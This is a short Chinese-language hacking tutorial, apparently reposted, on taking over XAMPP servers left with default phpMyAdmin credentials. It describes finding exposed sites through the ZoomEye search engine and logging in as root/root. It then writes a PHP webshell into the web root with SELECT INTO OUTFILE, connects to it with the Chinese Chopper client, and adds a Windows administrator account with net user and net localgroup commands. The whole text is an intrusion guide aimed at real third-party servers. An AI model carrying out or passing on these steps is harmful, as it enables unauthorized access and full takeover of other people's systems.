xampp默認配置拿shell
首先我們先來科普一下xampp(Apache+MySQL+PHP+PERL)是一個功能強大的建 XAMPP 軟件站集成軟件包 是一個易於安裝且包含 MySQL、PHP 和 Perl 的 Apache 發行版。XAMPP 的確非常容易安裝和使用:只需下載,解壓縮,啟動即可。 然后在安裝xampp的過程中 很多網站管理員對於mysql數據庫密碼 都會直接 默認 所以 就照成了這個漏洞的產生
好了 廢話不多說 我們直接上神器鍾馗之眼 server-status – server-info – phpmyadmin 賬號密碼: root/root port:80
如圖找到一個網站 進去 初始的phpinfo 箭頭指的是phpmyadmin的登陸地址
我們記下網站根目錄C:/Program Files (x86)/xampp/xampps/htdocs
點進去之后我們輸入 默認的用戶名和密碼 root root
進去之后我們呢輸入sql語句 select ‘php一句話’ into outfile ‘C:/Program Files (x86)/xampp/xampps/htdocs/mgsrc.php’ 寫入一句話
菜刀連之 然后我們在說一下提權
(1)首先輸入命令添加用戶:
net user test01 Mgs?1234567890 /add
(2)將普通用戶加入到超級管理組administrators
然后輸入net localgroup administrators mgsrc1 /add
(ps:在提權的時候 也走了很多彎路 這台服務器 的密碼策略沒關閉 所以 密碼組合必須為一個大寫字母 加一個符號然后加數字 而且 這台服務器 密碼位數不能超過14位 不然就無響應)
文章轉發地址:http://www.hackdig.com/04/hack-34524.htm